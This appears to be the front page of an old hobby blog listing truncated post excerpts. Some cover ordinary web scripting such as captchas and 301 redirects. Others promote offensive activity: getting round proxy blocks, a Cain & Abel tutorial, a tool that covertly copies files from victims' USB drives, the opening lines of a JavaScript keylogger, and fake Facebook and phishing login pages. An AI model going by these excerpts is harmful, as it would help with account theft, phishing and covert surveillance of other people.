Last Update

Anti Spam Scrips

Anti Spam scripts that will protect your forms to be submited by spammer's bots. Captcha (an acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart" ) is the most common and effertive spa, protction technique Captcha is a type of challenge-response test used in computing to determine whether or not the user is human or spammer's robot. A CAPTCHA involves one computer...

Free Arcade Script - PHP Script

ee Arcade script for your gaming site.Full Arcade Script Features:Admin Panel» Add Game (Self hosted or enabled hosted)» Manage Games (Edit/Delete)» Add Category» Manage Categories (Delete/Edit)» Add Link» Manage Links (Delete/Edit)» Approve Comments (Delete/Approve)» Site SettingsFrontend Features» Categories» Top Users» Links» Statics of website» Ajax Rating» Game Comments» Most Played Games» Newest...

301 Redirect

301 redirect is the most efficient and Search Engine Friendly method for webpage redirection. It's not that hard to implement and it should preserve your search engine rankings for that particular page. If you have to change file names or move pages around, it's the safest option. The code "301" is interpreted as "moved permanently". Below are a Couple of methods to implement URL Redirection IIS...

Go through a proxy server with IP Decimal

This is a trick to cut block the site from the ISP or cafe, or your office ...but with a different trick ...This is Poc ...1. Open cmdStart>> All Programs>> Accesories>> Command Prompt2. type ping terblock to the site we see addressnya ip ...I cite here http://www.youtube.combecause there are some ISP that block this site ...Code: Select allping www.youtube.comthen we can see the...

How to Break Proxy

Hey bro.. you are wicked.. thanks for this info:It's purpose if not for the bad things, speak well - both with thepossibility adminnya akan given permission to download. Actual networkadmin also want all parties can download, khan cape2 so ga ga usahnyetting2 proxy. But how ya want more, for the same ga kena angry boss,ya forced deh be busy - busy ria ngurus proxy.Here are caraku to go through a proxy...

Cain & Able Tutorial

This tutorial will cover (version 4.9.8)INTRODUCTIONCain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.We need to accomplish the...

Rampok v2.0

Rampok_v2.0 hacking tools that are very unique. Rampok_v2.0 can steal files from the USB enter in to a PC.How it works is very unique. Rampok_v2.0 work after the install and run. when he will run in the move all the files on the USB automatically to a folder that has been set.And how it works is not in the know, there are not on the task manager. Unique and the victim will not do if all the files...

Make Keylogger with javascript on the website

At this time I will discuss a bit about Javascript Keylogger.Wow ... Moreover tuh, Google may be able to answer you questions.Oke without many words directly aja yah ...First, open notepad or a pet you like WordPad, Notepad ++... The point is up ...Then paste the following code:[+]----------------------------------------------- -------------------var key ='';var space = ''function start ()(var xmlhttp;if...

Hacking Facebook (Taking other people Acount)

Who does not know that Facebook is all in the era of the internet this? Yap, Facebook is a social site, such as a laptop also ... (Males ngomong nih, a leader ma aja yah google ..)Yes I, my previous post about how to log on false friends, this time I post about how to create a false log on facebook.Yuuk directly to the discussion ... 1. Please list in http://www.700megs.com why do I send you...

Table rows

A common function on many php (or other data driven) sites is to loop through an array and write the contents of the array to the page. It is preferable to spread your data over multiple columns instead of writing it all in a straight list thus forcing your readers to scroll forever. Here is an easy way to dynamically write your cells and rows using expressions. !-- ...

Create fake login with Phiser Maker

Are you interested to make the page a fake site (phishing).What is phishing?Users for the virtual world is certainly not foreign to the word phishing ..word meaning is a word of English, which means fishing. In a world of well-connected electronically at this time, many phishing term defined as a way to provoke someone to a particular page.phishing is not infrequently used by the perpetrators of criminal...

Hide Your IP Address v.1.0

Hide Your IP Address purpose is to guard your privacy in Internet by changing your Internet IP Address. Start to surf anonymously. You can immediately take advantage of this handy and award winning software. The software will protect your Identity and Stop Hackers. Here is a short feature-list of this award winning software that gives you your privacy back!- Protect and hide your Identity through...

Followers

My Friends

Send Messange




Copyright 2009-2010 Junkelsee.tk. All Right Reserved

Back to TOP